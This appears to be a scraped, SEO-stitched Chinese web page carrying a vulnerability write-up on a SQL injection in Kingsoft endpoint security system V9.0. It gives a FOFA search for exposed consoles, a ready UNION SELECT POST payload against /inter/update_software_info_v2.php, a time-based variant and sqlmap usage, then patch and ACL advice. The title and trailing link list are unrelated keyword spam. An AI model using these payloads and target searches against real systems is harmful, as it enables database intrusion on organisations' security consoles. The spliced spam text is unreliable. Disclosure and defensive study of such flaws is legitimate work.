当前位置: 首页 > news >正文

重庆品牌营销型网站建设跨站攻击 wordpress

重庆品牌营销型网站建设,跨站攻击 wordpress,深圳华强北二手手机市场,网站建设行业动态0x01 产品简介 金山终端安全系统是一款为企业提供终端防护的安全产品#xff0c;针对恶意软件、病毒和外部攻击提供防范措施#xff0c;帮助维护企业数据和网络。 0x02 漏洞概述 金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞#xff0c;该…0x01 产品简介 金山终端安全系统是一款为企业提供终端防护的安全产品针对恶意软件、病毒和外部攻击提供防范措施帮助维护企业数据和网络。 0x02 漏洞概述 金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞该漏洞是由于金山终端安全系统未对用户的输入进行有效的过滤直接将其拼接进了SQL查询语句中导致系统出现SQL注入漏洞。 0x03 影响范围 金山终端安全系统V9.SP1.E1008 0x04 复现环境 FOFAtitle用户登录-金山终端安全系统V9.0Web控制台 0x05 漏洞复现 PoC POST /inter/update_software_info_v2.php HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodedtype-1UNIONSELECT1,user(),3,4,5,6,7,8--keypageCount0curPage 查询当前用户 延时注入 Sqlmap验证  数据包放txt里面 POST /inter/update_software_info_v2.php HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodedtype-100*keypageCount0curPage0x06 修复建议  升级修复方案 官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站更新版本至新版本。https://www.ejinshan.net/lywz/index 临时缓解方案 通过网络ACL策略限制访问来源例如只允许来自特定IP地址或地址段的访问请求。另外作为安全建议不要将集权设备的Web管理控制台开放在互联网上并且仅允许可信IP进行访问。
http://www.sadfv.cn/news/320166/

相关文章:

  • 免费素材网站可商用网站搭建怎么收费
  • tp框架做响应式网站wordpress可以做博客吗
  • 兰州做网站网络平台怎么制作
  • 个人购物网站 怎么建网络推广平台哪家公司最好
  • 北京设计网站的公司哪家好北京酒店设计公司
  • 汉口江岸区城市建设局网站网页改进方案
  • 自助建设彩票网站wordpress下一篇调用
  • 支付网站建设费入什么科目增城门户网站
  • 网站开发就业方向网站支持asp
  • 潍坊市住房和城乡建设厅网站网站设计的基本知识结构
  • 高邮市城乡建设局网站交互式网站
  • 大气网站背景图企业年金什么时候可以提取
  • 长沙网站seo收费标准网站备案 注意
  • 网站找到后台了 如何破解账号 密码邢台wap网站建设费用
  • 网站建设人员百姓网为什么不能创建地址
  • 做城通网盘资源网站的源码仿大学网站网页代码
  • asp.net mvc 手机网站江苏市场监督管理局旗舰店
  • 全景网站app网站优化人员通常会将目标关键词放在网站首页中的
  • 投资做网站网站宽屏
  • 上海网站建设 销售网络推广好做吗多少钱
  • 金坛城乡建设管理网站没有足够的权限卸载2345网址导航
  • 优质的网站建设公司水泵网站站群建设
  • 自己开网站能赚钱吗网络平台制作公司
  • 公司网站建设推广方案模板重庆建设工程信息网官网加密锁安装驱动
  • dede修改网站密码中国建设银行的网站用户名是什么
  • 电子商城网站开发与设计最新新闻事件今天国内大事2022
  • 做网站需要什么功能教师在哪些网站可以做兼职
  • 做网站风险分析长春手机网站
  • 镇江网站建设推广找思创大连企业制作网站
  • tom企业邮箱注册十堰网站seo技巧